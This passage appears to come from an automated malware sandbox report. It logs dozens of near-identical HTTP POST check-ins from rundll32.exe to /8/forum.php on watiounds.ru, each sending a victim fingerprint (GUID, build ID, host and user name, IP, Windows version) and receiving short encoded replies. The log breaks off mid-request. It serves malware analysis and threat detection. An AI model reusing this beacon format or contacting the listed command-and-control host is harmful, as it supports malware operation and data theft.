                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:47.044110060 CEST | 91 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 54 47 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBTGYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          51 | 192.168.2.22 | 49216 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:47.366738081 CEST | 92 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:47.491266012 CEST | 92 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 59 42 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTYBGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          52 | 192.168.2.22 | 49217 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:47.821953058 CEST | 93 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:47.944406986 CEST | 94 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTZAGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          53 | 192.168.2.22 | 49218 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:48.276113987 CEST | 94 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:48.398730040 CEST | 95 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVNMEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          54 | 192.168.2.22 | 49219 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:48.728147984 CEST | 95 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:48.850464106 CEST | 96 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYHSBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          55 | 192.168.2.22 | 49220 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:49.173530102 CEST | 97 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:49.298290968 CEST | 97 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 41 5a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYAZBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          56 | 192.168.2.22 | 49221 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:49.635909081 CEST | 98 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:49.764117002 CEST | 98 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQZAJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          57 | 192.168.2.22 | 49222 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:50.082720041 CEST | 99 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:50.206660986 CEST | 99 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          58 | 192.168.2.22 | 49223 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:50.542601109 CEST | 100 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:50.671019077 CEST | 100 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBZAYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          59 | 192.168.2.22 | 49224 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:51.007761002 CEST | 101 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:51.130239964 CEST | 101 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 48 53 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFHSUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          6 | 192.168.2.22 | 49171 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:17:47.446813107 CEST | 18 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:17:47.575416088 CEST | 18 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:17:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAAZZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          60 | 192.168.2.22 | 49225 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:51.455270052 CEST | 102 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:51.578043938 CEST | 102 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4b 50 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKKPPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          61 | 192.168.2.22 | 49226 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:51.904398918 CEST | 103 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:52.028686047 CEST | 104 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          62 | 192.168.2.22 | 49227 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:52.356420040 CEST | 104 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:52.478591919 CEST | 105 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4d 4e 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHMNSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          63 | 192.168.2.22 | 49228 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:52.803415060 CEST | 106 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:52.926666975 CEST | 106 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          64 | 192.168.2.22 | 49229 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:53.247087002 CEST | 107 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:53.370409966 CEST | 107 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          65 | 192.168.2.22 | 49230 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:53.702891111 CEST | 108 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:53.826677084 CEST | 108 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFCXUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          66 | 192.168.2.22 | 49231 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:54.155407906 CEST | 109 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
